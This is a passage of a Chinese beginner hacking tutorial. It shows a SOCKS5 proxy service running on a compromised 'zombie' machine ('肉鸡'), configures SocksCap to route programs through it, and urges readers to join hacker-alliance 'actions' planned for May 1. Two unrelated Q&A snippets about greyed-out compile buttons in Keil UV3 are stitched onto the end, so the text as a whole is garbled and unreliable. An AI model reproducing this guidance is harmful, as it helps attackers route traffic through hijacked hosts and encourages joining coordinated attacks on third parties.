来检查一下是不是启动了：
c:>net start <-----------看看启动的服务列表
These Windows 2000 services are started:

Print Spooler
Server
Snake SockProxy Service <---------------就是它，呵呵!
System Event Notification
TCP/IP NetBIOS Helper Service
Telephony
Telnet
The command completed successfully.

c:>_
好了，到这里我们已经做好了一个socks5代理了，我们自己的哦.OK，下面我们用sockscap来使用我们做代理。
安装好SocksCap后，我们在桌面上打开SocksCap V2，点开File选项选Settings...弹出卡片，在 SOCKS Server里面我们填肉鸡的IP：127.0.0.1，PortT填默认的1813端口，下面的我们选socks version 5，呵呵，和 Attempt local then remot,这是域名解析的顺序，先本地，然后才远程。设置完了点“确定”我们就可以使用了，添加应用程序到sockscap里面，点开那个"new"按钮，会弹出一个卡片，
Profile name ：程序名，随便写。
Command Line: 命令行，点后面的Browse...找到你的程序路径
Working:填好上面那个，这个就自动加上.
这样我们就把程序加到SocksCap里面了。
现在们可以双击里面的程序来使用，也可以选住程序在点"Run"来运行。

好了，终于写完了，上面的内容都很简单，很适合初学者，还望高手们不好见笑，刚好听说这次5.1有很多联盟有所行动，希望上面的内容能教会一部分人，少走弯路，让更多的人参与这次行动。UNIX和LINUX由于自己的功力也还不够，还差很远，所以还不敢写。

⑦ Keil UV3的编译图标是灰色的，没法编译程序了，怎么解决

1.你先看看窗口文件的标签，若带
星号
的话，此时也是你那种情况，你先保存一下就行了
2.文件没有加到工程中去，也会出现上面的问题

⑧ keil上编程序 为什么编译和运行都是灰色的怎么解决啊

首先确认你是否正确创建了项目。连项目都没有是无法编译的。